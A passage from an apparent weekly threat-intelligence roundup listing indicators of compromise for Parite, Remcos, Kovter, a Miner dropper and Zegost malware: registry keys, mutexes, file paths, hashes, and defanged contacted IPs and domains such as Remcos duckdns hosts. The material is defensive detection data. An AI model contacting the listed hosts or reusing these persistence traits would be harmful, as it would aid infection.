bc2622816c972a21201772fd8b7635ecff8c1fcb6249dd02266ab92f1fa2687f c4fa6dc2ae89d1530423bb9842af7ba8e800b05ff81315130f9de893beb89288 da624ceb034570a844d919d20f1ac7db99516558cb6e2571e1ddd2f46d73c7e5 e27f924db5152237a6783a43d6bd982ab3dbd0e22aee3e8dc70980b083cff767 eccfe2366884a5a947aad1c26277043e3af20e6d1cf8e27b48e0bb72b1e963bd fc8946571e73d04ade5a3308de8b191eb747667fb31aa10162174542674a9746 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0W13rKGvaSM/XURD-ARjbzI/AAAAAAAAB5M/C_JpTRreNg07q7OT4vK3Ji_4Xjo08RAFQCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NBjRP-eCVtc/XUREDbwSYjI/AAAAAAAAB5Q/3s2qjGor-eEZxUysFeyMYg2nZwEZl0K7QCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-1BAR8R8PCBQ/XUREKLL4NAI/AAAAAAAAB5U/ntsJfLx-dUs5f9cVwtn1BzyKTvi6wPHdgCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-Q4usCsyVhqo/XUREOn3AtaI/AAAAAAAAB5c/B8b0WCNgW1c5kZZmtNwBbUGsd3k-tEk9wCLcBGAs/s1600/b7b24dc901e44293beaaa7ec379b8e8feb917abde42fdcdb38de5eda3cb147fa_malware.png>)\n\n** \n**\n\n* * *\n\n### Win.Virus.Parite-7090021-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Wow6432Node\\Intel\\ICCInst ` | 25 \nMutexes | Occurrences \n---|--- \n`Residented` | 25 \n`Global\\IIF-{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 21 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 21 
\n`%TEMP%\\bna1.tmp` | 2 \n`%TEMP%\\fpa1.tmp` | 2 \n`%TEMP%\\edb242D.tmp` | 1 \n`%TEMP%\\ldb2574.tmp` | 1 \n`%TEMP%\\spb9CB6.tmp` | 1 \n`%TEMP%\\ceb291C.tmp` | 1 \n`%TEMP%\\ddb2324.tmp` | 1 \n`%TEMP%\\rpb98B0.tmp` | 1 \n`%TEMP%\\npb9788.tmp` | 1 \n`%TEMP%\\txbEAC6.tmp` | 1 \n`%TEMP%\\upb96CD.tmp` | 1 \n`%TEMP%\\hob9547.tmp` | 1 \n`%TEMP%\\opb9A94.tmp` | 1 \n`%TEMP%\\mhb4D7E.tmp` | 1 \n`%TEMP%\\feb2832.tmp` | 1 \n`%TEMP%\\lrbB277.tmp` | 1 \n`%TEMP%\\veb29D8.tmp` | 1 \n`%TEMP%\\ngb3F89.tmp` | 1 \n`%TEMP%\\apb9602.tmp` | 1 \n`%TEMP%\\vgb41DA.tmp` | 1 \n`%TEMP%\\ogb4093.tmp` | 1 \n`%TEMP%\\qgb3FA9.tmp` | 1 \n`%TEMP%\\hgb4257.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0de64a980bd8ba77c2d6f216bac219376a5981e3e3bca7fb7797d8658e0af56f 1a949bb288102e17fc51645e7cbf098ccdaa3fb5414d2874f454b67133cfeff6 1ac60ed1f894fc3758748ba428554b91253af824d56972e3af76f3b4932d75f8 2571f483b3363c6f4e31b5fe674958ecd78f10c82211b56e3a3da07175404f5c 2f59cc275a2306af4c0c22aabbb672fe316358b105b8aa1d1df9e34e8b8141ba 32438083d79ac23f89bc2f96befd073ca3f4a30f831aa85dcded3f0e6bde168a 363ba569063f98eed6553089dd75c19d8f87f8adc171a4c707f6e4158cd0b37c 3ce4b7ade0171971c2c8106b9b58fa5432e8feba8d10b80f2a82f87511eb4a84 3efcc75fac41f6a3f8cf626753c72f6df00ff8617640989bfc67f284a6782eab 42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965 47be4b0e8768289addb59602b024887db8c8ebca026bc054eb1d03f6602e09b7 4d6b7067ff55b4e5025f0713aa0f93328ca500444f5c52c4b84993d0c00a3675 5386a3f5dfa37f454ce6ea8aba622cdea0e1a6e7bfee4b34c3235eeb6ca7c21d 5e5e207352827e19880e32e481281ae32a895bfa47af7702cbeb49f6a90404a6 66da22fd2c8d82e6267c6b21d03dd20f1fb9f242170f4a3c2b0e05b337a1080c 919864b47bbb9dc802df79a974f0a119e79e4ddab76c01cf79071d9a4866c8df 9220f5a71a621ac56ab75aef023d15fedf18fe40dd094a2409a1586712b929b0 949add118d6e884685a78104077991d8cff1a0b9b28e8359d551ab4b698b3af8 9ceee0623cb6c2c1f94b4cb90b2a0cfb6a07e203e3d901b8c5a2cfcba34d46ca 9d60933316a5def1ddf71e9dddbcd48b2b2f5cd711cc7dd1ce1354655dbcd2a9 
bd8d558604fc04fde215abf52ed73ecde6a7f97bfd48f9540b8dc823054525a8 c07b02bff8ebaa27f5da40de8c92ba78c2f9a1d3c76dee6c4f76596594d68f0f c71ced95ef06e91dd6083a21bfae4bcf5696ba91d5b7c25b1ce62e2fbc58450c cf0face1fb821f4ce1944f65549e242b1b033e7525921c3e24d027dd4efbcaa6 ea873fa6d0bad68c2f2c52949a2eb10aadf140ad0cf5b5b753819a1063a14fbb `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-5OIquQni3Tc/XUREW1tDmaI/AAAAAAAAB5k/mgOvZoV1OxUUducbCoQjJEAzYbcV9eQwwCLcBGAs/s1600/42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Oo_A84lo6jI/XUREdFEafrI/AAAAAAAAB5s/H2CIxZ4cZyM13kFAs0y4Hokyp_ITEeuFACLcBGAs/s1600/42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965_tg.png>)\n\n \n\n\n* * *\n\n### Win.Malware.Remcos-7089920-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\Software\\Microsoft\\Windows Script Host\\Settings ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 22 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 22 \n`<HKCU>\\Software\\Remcos-F5NWKC ` | 14 \n`<HKCU>\\SOFTWARE\\REMCOS-F5NWKC \nValue Name: exepath ` | 14 \n`<HKCU>\\SOFTWARE\\REMCOS-F5NWKC \nValue Name: licence ` | 14 \n`<HKCU>\\Software\\Remcos-FNLRTG ` | 6 \n`<HKCU>\\SOFTWARE\\REMCOS-FNLRTG \nValue Name: exepath ` | 6 \n`<HKCU>\\SOFTWARE\\REMCOS-FNLRTG \nValue Name: licence ` | 6 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 22 \n`Remcos-F5NWKC` | 16 \n`Remcos-FNLRTG` | 6 \n`Global\\82814f21-b3c0-11e9-a007-00501e3ae7b5` | 5 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]69[.]169[.]25` | 14 \n`179[.]33[.]146[.]222` | 6 \n`172[.]217[.]7[.]238` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`abeasinf[.]duckdns[.]org` | 14 \n`remsalvados2019[.]duckdns[.]org` | 6 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 22 \n`%APPDATA%\\remcos` | 20 \n`%APPDATA%\\remcos\\logs.dat` | 20 \n`%APPDATA%\\System32` | 16 \n`%APPDATA%\\System32\\task.exe` | 16 \n`%APPDATA%\\explored` | 6 \n`%APPDATA%\\explored\\task.exe` | 6 \n \n#### File Hashes\n\n` 07e4832ad064b83345dc65d845c656acb036d1ba416aeba93ea1e5e455e5d93f 0e4ef97aaa97a61adfcbcc801ae9bf1554aff454f17ecc1c12ae1b78de63a82f 0f73749d1f1275074b813d85df5da536242a5dd841df5e6beccda497da11c688 2428324467859f295b59fa94ae4a2d46383e727ecde439b9ae8a98ee3a058c82 33b9073da941fe67d1c2d6ac3db931a12dd16eff3e40614d142ba9f20a2f6cfa 40ddc409d3c26b0d6718b9933242c6c8a317d82626f2b5657b6d53ca1e94f8b9 4eb7eb5ff66633577f584e08638eddb1f175295dc6f140e4daaa499503c7903d 53d5a95234af1e094671269c8de5e54675495a7d6ff7d00736ebc9c5d7f9233e 603b1c659c004167578170b44c3b953eeed7caf47dcf878cde6a085e096b2d0a 615d24c911f1a5f99250f0b16003d1a52f22f9f9e3560863f542f624132239b0 637f60b9ca2e20c192e3c9758972477cf4389a0e6b86d2e68e3712855eaf5bf4 6cc16b02084076c656e304e81712f27f8813d7b97b8851517946a7e2cc933d31 6f54f3d6d8c7f4487e56368ee015c1d4fbc00bc77bdc76b45d14530ca28980ef 7a1fbd0098df288e866f3cc6cad071a616fe4916f5f489d6ddda5bc077c7bbdd 868dc90c4bbc89a2b21cea9d234e4189578b6c3beeb590126ae6ae949f62eaf4 8ee5bda36b3104b33ac8f5e8b8ac9828717e27bc8a66a8bd24a85f01bf84a95f 8f9a5246320b31ca9e48b8e8ff53918705d311a8afd6dd144797166751a6d469 9a8e4530aa2a8aaad91f72014d2b2878f557c3e424fc4f0b9ff3e6768f8fe912 9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52 9bd3531c471b33207020377534b3bd9bbf5ea46a0a20006952b8627ff400fc51 a03f12df245983e127285885886bbe98377cafb7bbcd11e26bf0b8841ff991e9 
a13e9d6bd38f8579d6bb06fb51be5354fd3e7704adf159817499d1bc536091a1 a98a627f7eeeba6267037bab8ad15c6443547a1d1fcd148d6a7934ffa6e1062e acc90634c7b0d8ebb28d8763c5395eb4b715a66b0caf2b299921be3b7fd3593d b06c46bcb19243e30ed996e2af8ba284f413863bc57402345bc09b5e42389ceb `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-thT-pcUBWcg/XUREm_ltKQI/AAAAAAAAB50/Cmxva5n-PmE4GUaZxZRmx25b8_rxEGjBQCLcBGAs/s1600/9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-yNNkbQreVXg/XURErr17JOI/AAAAAAAAB54/w5ccfeVvSzIBMUXioi8tt4lA-uYKjulxwCLcBGAs/s1600/9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7086582-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run ` | 25 \n`<HKCU>\\SOFTWARE\\3a91c13ab1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3a91c13ab1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 23 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 23 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\5F287F4F75829A94 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\zT1Dki ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\5F287F4F75829A94 \nValue 
Name: 016CFBC1BABEFF10 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\ZT1DKI \nValue Name: CpYrHqV ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\ZT1DKI \nValue Name: 39WZL4 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\90ED0D761B2FB199A ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\olRmhsU ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\90ED0D761B2FB199A \nValue Name: 7A09ED122AF4ECD0E83 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\OLRMHSU \nValue Name: vsctEaBx ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\OLRMHSU \nValue Name: 80de8Ae ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\C9E39C761A77CAC1DC ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\l0CEbsVa ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\C9E39C761A77CAC1DC \nValue Name: E6D1B26BEF7541793FF1 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\L0CEBSVA \nValue Name: rSCO76J ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\L0CEBSVA \nValue Name: PY7gGpGla ` | 1 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 25 \n`A83BAA13F950654C` | 25 \n`Global\\7A7146875A8CDE1E` | 25 \n`B3E8F6F86CDD9D8B` | 25 \n`\\BaseNamedObjects\\408D8D94EC4F66FC` | 25 \n`\\BaseNamedObjects\\Global\\350160F4882D1C98` | 25 \n`\\BaseNamedObjects\\053C7D611BC8DF3A` | 25 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`157[.]249[.]130[.]189` | 1 \n`112[.]51[.]201[.]117` | 1 \n`53[.]61[.]24[.]171` | 1 \n`119[.]97[.]239[.]35` | 1 \n`188[.]236[.]23[.]197` | 1 \n`1[.]165[.]149[.]97` | 1 \n`27[.]173[.]241[.]96` | 1 \n`147[.]117[.]235[.]220` | 1 \n`26[.]218[.]146[.]92` | 1 \n`209[.]73[.]97[.]109` | 1 \n`139[.]121[.]49[.]82` | 1 \n`119[.]149[.]159[.]187` | 1 \n`191[.]184[.]185[.]179` | 1 \n`6[.]40[.]66[.]225` | 1 \n`112[.]117[.]175[.]94` | 1 \n`172[.]43[.]49[.]44` | 1 \n`6[.]214[.]160[.]88` | 1 \n`28[.]29[.]189[.]12` | 1 \n`60[.]97[.]36[.]141` | 1 \n`99[.]24[.]117[.]121` | 1 \n`192[.]242[.]171[.]82` | 1 \n`74[.]101[.]122[.]65` | 1 \n`5[.]107[.]225[.]199` | 1 \n`165[.]64[.]226[.]220` | 1 \n`109[.]209[.]166[.]138` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`A` | 25 \n`api[.]w[.]org` | 1 \n`home[.]pl` | 1 \n`php[.]net` | 1 \n`www[.]interworx[.]com` | 1 \n`www[.]openssl[.]org` | 1 \n`apache[.]org` | 1 \n`lod[.]is` | 1 \n`dev[.]allsystemsgomt[.]com` | 1 \n`allsystemsgomt[.]com` | 1 \n`allsystemsgocomputer[.]business[.]site` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`1.txt` | 25 \n \n#### File Hashes\n\n` 0c308626f38e758cdb362c216e98b86754423ee8a7db0c6cdc73e9aaacbfbd57 158542e3697bb1d467a68b50035950a6eee3f4cdf4a87ef35ec280f092aa8f24 179bfcba0795d5b8c53cd381a3bd5272b0ba170cb76312263f7cf7fa9801950b 17f14b4856e5f4919f908400d8789cc8388381989d4f1333ec6c70346c8d78d3 1c6937a286b18f016d6687ba872b0d19cf99932f523b8c9b98e5203dce8636b3 246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426 2a10ba74892b50cfe9338482c758d0eff0f62c2cf5e5750c05779d9c67381bd5 4839855b43c168a5f5a92266906c8b070cc65d496e0f37978b6f34eae30327b2 48dccfab3d58e5370ddd4481768e7f66fe259364367c7ae40a45ed74ef67323a 4e78f30bb53f103efa2923359348c48d1cff85fb481ee60c70fb7937f44d6f0d 4f9607712eaad7066f27a05e427dc18661cb6f4847d59027ae1ef20400975a9f 
4fda5660b594ab93dfac2a37a0bb114b8d68fc51334431f3d1c1ddb982dd6446 500fd828118c21813966513f5fd4d0badebae33e7b8280a95a8924a4a5eebba1 59ac65640ef6b7d2236b869ad56315567652eaa87c9161ec001950b00ca98608 60bd60bdf77e61d2acbf4980229ae21a2ac24ea381f58ca5cbc1d67fc1ed6775 62fdea9bdc0d4ed1f1c05f333af859f548e1442eaacbdac8645750694d4e575d 7148d96630544e09b466bddc4a8ac60eeadc05af9afb4dbc85a8621a93400c18 7a21fa88108ed9456d3a462c9c57487c8def488728995b2a858d13641465df5d 7d07b0f68bd1873e5372cc79d7e24e4d2c70d5fdc55ad01aff968c42a428d484 866c5a060cf8f44209a39d358ec0c6a872317f3957f08609b1817774eabce57f 8e08a03289e73d0bf196fcb4f36a16ab547f9eb4ef6f38ff20fa70d898871ee0 9acb88217e012f43bdfa085b062c5da48ab5dd5ed888be77f9617a1ba2400c93 a89ace7661f6189a698955d46e97ebe3da70a308e25a4b7862c5dde9b3d4776c afb3a3ca5db5736154aabfc6e86bd31b7c0fb725fdc67eb42a02e0e211f9831c b092d2e89c04741e1d5150767a0e79a49e6edb05a142ccb7a971373c2abb3ae8 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-o34qMZeyPt0/XUREzY-N5rI/AAAAAAAAB58/K6qHa7fPO2s6pBctlYFhhBUiw5oAkSo6ACLcBGAs/s1600/246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-q20I_iz9jOk/XURE4RjotAI/AAAAAAAAB6E/pE7q6UzjzfEs5TK--wg675yzwdVyYUUSQCLcBGAs/s1600/246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Miner-7086571-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Quarantined ` | 21 \n`<HKLM>\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Monitored ` | 21 
\n`<HKCU>\\Software\\OCS ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: CID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: PID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: lastPID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: lastSID ` | 19 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 2 \nMutexes | Occurrences \n---|--- \n`Local\\https://www.chip.de/` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]13[.]208[.]26` | 17 \n`91[.]199[.]212[.]52` | 11 \n`176[.]9[.]97[.]244` | 11 \n`5[.]9[.]198[.]83` | 10 \n`5[.]9[.]176[.]3` | 10 \n`5[.]9[.]116[.]27` | 6 \n`5[.]9[.]175[.]19` | 4 \n`204[.]79[.]197[.]200` | 2 \n`172[.]217[.]12[.]198` | 2 \n`54[.]210[.]244[.]131` | 2 \n`64[.]202[.]112[.]63` | 2 \n`23[.]6[.]70[.]227` | 2 \n`13[.]107[.]21[.]200` | 1 \n`151[.]101[.]2[.]2` | 1 \n`151[.]101[.]66[.]2` | 1 \n`173[.]223[.]56[.]52` | 1 \n`173[.]223[.]236[.]173` | 1 \n`96[.]6[.]22[.]211` | 1 \n`96[.]6[.]29[.]52` | 1 \n`64[.]202[.]112[.]31` | 1 \n`70[.]42[.]32[.]31` | 1 \n`23[.]32[.]81[.]249` | 1 \n`23[.]41[.]180[.]26` | 1 \n`35[.]158[.]10[.]18` | 1 \n`104[.]121[.]102[.]142` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]chip-secured-download[.]de` | 21 \n`e3056[.]dscg[.]akamaiedge[.]net` | 12 \n`www[.]chip[.]de` | 12 \n`ocs3[.]chdi-server[.]de` | 10 \n`ocs2[.]chdi-server[.]de` | 6 \n`crt[.]usertrust[.]com` | 5 \n`ocs1[.]chdi-server[.]de` | 4 \n`schema[.]org` | 2 \n`ad[.]doubleclick[.]net` | 2 \n`odb[.]outbrain[.]com` | 2 \n`tcheck[.]outbrainimg[.]com` | 2 \n`log[.]outbrainimg[.]com` | 2 \n`widgets[.]outbrain[.]com` | 2 \n`mcdp-nydc1[.]outbrain[.]com` | 2 \n`efahrer[.]chip[.]de` | 2 \n`gutscheine[.]chip[.]de` | 2 \n`services[.]chip[.]de` | 2 \n`www[.]summerhamster[.]com` | 2 \n`filestorage[.]chip[.]de` | 2 \n`apps[.]chip[.]de` | 2 \n`search[.]chip[.]de` | 2 \n`mms[.]chip[.]de` | 2 \n`www[.]interred[.]de` | 2 \n`www[.]chip-kiosk[.]de` | 2 \n`chip[.]info` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\DMR` | 21 \n`%TEMP%\\DMR\\dmr_72.exe` | 21 \n`%HOMEPATH%\\NTUSER.DAT` | 21 \n`%HOMEPATH%\\ntuser.dat.LOG1` | 21 \n`%APPDATA%\\Microsoft\\CryptnetUrlCache\\Content\\E0968A1E3A40D2582E7FD463BAEB59CD` | 20 \n`%APPDATA%\\Microsoft\\CryptnetUrlCache\\MetaData\\E0968A1E3A40D2582E7FD463BAEB59CD` | 20 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E}\\LocalServer32` | 1 \n`%TEMP%\\DMR\\ishnuwkqraonlvar.dat` | 1 \n`%TEMP%\\DMR\\usbxlrosrdztgwpi.dat` | 1 \n`%TEMP%\\DMR\\seysuwrfdtqhnrpj.dat` | 1 \n`%TEMP%\\DMR\\xglpmhfhfspocakr.dat` | 1 \n`%TEMP%\\DMR\\lbhlcyuzmtpetsxw.dat` | 1 \n`%TEMP%\\DMR\\gwlwmrciqqkeyeks.dat` | 1 \n`%TEMP%\\DMR\\ymbcvbzrdalmdftj.dat` | 1 \n`%TEMP%\\DMR\\hpiylxvkyztuheei.dat` | 1 \n`%TEMP%\\DMR\\dpnpigfwacztjuns.dat` | 1 \n`%TEMP%\\DMR\\spvazpzpxhusfvjq.dat` | 1 \n`%TEMP%\\DMR\\fhandfasizfmozvg.dat` | 1 \n`%TEMP%\\DMR\\nvdvdyywkouvxaym.dat` | 1 \n`%TEMP%\\DMR\\puzhauckewbevmtx.dat` | 1 \n`%TEMP%\\DMR\\bacuhsidwpicjayv.dat` | 1 \n`%TEMP%\\DMR\\vjjeolwfjjggtcev.dat` | 1 \n`%TEMP%\\DMR\\sfmbwidykwqvqawj.dat` | 1 
\n`%TEMP%\\DMR\\fnoohkjzniiixfov.dat` | 1 \n`%TEMP%\\DMR\\mygfrlcodocysopx.dat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 4f14400c7865d769d6c4328464b49cc4e179124a00a423204356285846a0b07f 666a1635a2d0fb5cbc4af2749198f4c0fe57bdb27e3f5b60ea194081b2a373b1 68371d415a84102cc9c42fce2e2b434e984a7cd6824cd6d25c33496b4b779cd8 6e6043d7c25d2c717bbecd32b9fdd60291e2012d2df692319c1b76894c9e88b4 6fef1f8672b5c19972babe4f533dd84964ba67dcea8013545a1756150a043f02 701c053066142c8ce92f00a1739c7c7fee19165799067a1478e2d2f4b0660300 756c99bdbf516b88d69aecafd94b81d338718364fed4a66e0e7430f5070fe4d3 7cc3b82e8ea40284061707c6918eb30b94c2d153bdad7ebcea40fb74269e800d 8f86d8033e08b367c9577f9c1d5f0f67f914687607720a627ce4467d855acb31 95f954c65d2f3f44015ba04d3bd95b2c14eb25702549c2ec46402a79caf5bf4b 9849abcf225ff91f2b50db88c8330f27477f753c1062980ad3a61e66729b9319 992778f2fb834d928bdc56df4d782f841475183e2cd156b153e6f5fe5b5cfa70 9b833124a43f9edd8482da692534ae3165026eeb0885f0a426da434993661d4d a0ae34105095f8e498f5ef7fa3a2c70c1fca7d0463453114d8e6fcb1400cf4b7 aa032e4e646aed28148b54ffab1671aeabf99d6695341c273d6b20921092cb3a bde0eefd7fd333518f0d29c8e4e82d635c77f2511eaaafc8cd38b1cc185fe423 ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18 e0d5e5618ae25a2f13cdb593db3e51e6fb92cb63518c3416b4d122d8a82fc284 e12019286976d31196602d1c653f984ed376d6a18bddfda61b7cff437b4aaab7 ee7740f172da0a36060ba569cab938764d6646d82473b35bc05361e9bbc16f24 f2fb2e8f9f7826463ba3ca722fe33bf9c7525f4cb6f69d5d248843542de16da3 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-S-sYNmqBhwU/XURFBImcEyI/AAAAAAAAB6M/_hch7QgtQwIvNFNaSJzLLBOQHq1lcrtjQCLcBGAs/s1600/ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-dOdZlABQ9k8/XURFFVIODII/AAAAAAAAB6U/hYLUYg5qC4MfcVL8eLHpmIjY1mkeHjo7QCLcBGAs/s1600/ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18_tg.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Zegost-7086512-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Wow6432Node\\Microsoft\\DownloadManager ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: XXXXXX579E5A5B VVVVVVrr2unw== ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: XXXXXX2CD24958 ` | 1 \nMutexes | Occurrences \n---|--- \n`AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==` | 11 \n`AAAAAA8fjz+gD9A66xsL0A/AP98L0A/PqpprOwnw==` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- 